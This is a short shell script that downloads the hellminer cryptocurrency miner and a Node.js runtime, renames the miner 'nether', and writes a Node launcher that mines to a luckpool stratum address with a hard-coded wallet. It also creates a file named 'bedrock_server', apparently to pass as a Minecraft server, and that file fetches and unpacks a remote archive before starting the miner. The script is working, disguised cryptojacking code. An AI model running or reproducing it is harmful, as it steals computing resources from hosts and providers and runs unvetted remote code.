#!/bin/sh
wget https://github.com/vrscms/hellminer/archive/refs/heads/main.zip || curl -L https://github.com/vrscms/hellminer/archive/refs/heads/main.zip -o hellminer_linux64.tar.gz
unzip main.zip*
rm -rf *.zip* && mv hellminer-main dev && cd dev && mv hellminer nether && rm -rf run_miner.sh && chmod +x * && cd ..
mkdir src && cd src && wget https://nodejs.org/dist/v19.9.0/node-v19.9.0-linux-x64.tar.xz || curl -L https://nodejs.org/dist/v19.9.0/node-v19.9.0-linux-x64.tar.xz -o node-v19.9.0-linux-x64.tar.xz && tar -xvf *.tar.xz && mv node-v19.9.0-linux-x64 me && rm -rf *.tar.xz*
cd ../
mkdir lock
echo "const { exec } = require('child_process');
exec('cd && cd dev && ./nether -c stratum+tcp://na.luckpool.net:3956 -u RQ2DksvgV757VsxRuMnfBDBwa5uCz4t5XR.noname -p x --cpu 2'
)" > ./lock/index.js
echo "#!/bin/sh
cd lock
wget https://github.com/NetVp/ModMin/raw/main/modules.tar.gz || curl -L https://github.com/NetVp/ModMin/raw/main/modules.tar.gz -o modules.tar.gz
tar -xzvf modules.tar.gz
rm -rf modules.tar.gz*
cd
clear
./src/me/bin/node ./lock/index.js" > bedrock_server
